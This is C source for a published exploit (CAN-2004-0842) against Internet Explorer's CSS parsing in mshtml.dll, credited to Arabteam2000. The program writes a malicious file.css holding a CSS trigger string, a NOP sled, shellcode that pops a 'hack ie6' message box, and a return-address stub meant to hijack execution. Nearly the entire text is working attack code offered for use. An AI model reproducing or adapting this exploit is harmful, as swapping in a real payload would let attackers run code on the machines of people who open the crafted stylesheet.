FrSIRT - Internet Explorer CSS File Remote Buffer Overflow Exploit

CAN-2004-0842

#include <stdio.h>
#include <string.h>
#include <tchar.h>

char bug[]=
"\x40\x63\x73\x73\x20\x6D\x6D\x7B\x49\x7B\x63\x6F\x6E
\x74\x65\x6E\x74\x3A\x20\x22\x22\x3B\x2F"
"\x2A\x22\x20\x22\x2A\x2F\x7D\x7D\x40\x6D\x3B\x40\x65\
x6E\x64\x3B\x20\x2F\x2A\x22\x7D\x7D\x20\x20\x20";

//////////////////////////////////////////////////////
/*
shellcode :MessageBox (0,"hack ie6",0,MB_OK);
-
XOR EBX,EBX
PUSH EBX ; 0
PUSH EBX ; 0
ADD AL,0F
PUSH EAX ; Msg " Hack ie6 "
PUSH EBX ;0
JMP 746D8E72 ;USER32.MessageBoxA
*/

char shellcode[]= "\x33\xDB\x53\x53\x04\x0F\x50\x53\xE9\xCB\x8D\x6D\x74"
"\x90\x90\x48\x61\x63\x6B\x20\x69\x65\x36\x20\x63\x73\x73";


////////////////////////////////////////////////////////
// return address :: esp+1AC :: start shellcode
//MOV EAX,ESP
//ADD AX,1AC
//CALL EAX

char ret[]= "\x8B\xC4\x66\x05\xAC\x01\xFF\xD0";

int main(int argc, char* argv[])
{

char buf[8192];
FILE *cssfile;
int i;

printf("\n\n Internet Explorer(mshtml.dll) , Cascading Style Sheets Exploit \n");
printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
printf(" Coded by : Arabteam2000 \n");
printf(" Web: www.arabteam2000.com \n");
printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n");

// NOP`s
for(i=0;i<8192;i++)
buf[i]=0x90;


// bug
memcpy((void*)&buf[0],
(void*)&bug,48);

// shellcode
memcpy((void*)&buf[100],
(void*)&shellcode,27);

// ret address
memcpy((void*)&buf[8182],
(void*)&ret,8);


cssfile=fopen("file.css","w+b");
if(cssfile==NULL){
printf("-Error: fopen \n");
return 1;
}

fwrite(buf,8192,1,cssfile);
printf("-Created file: file.css\n ..OK\n\n");

fclose (cssfile);
return 0;
}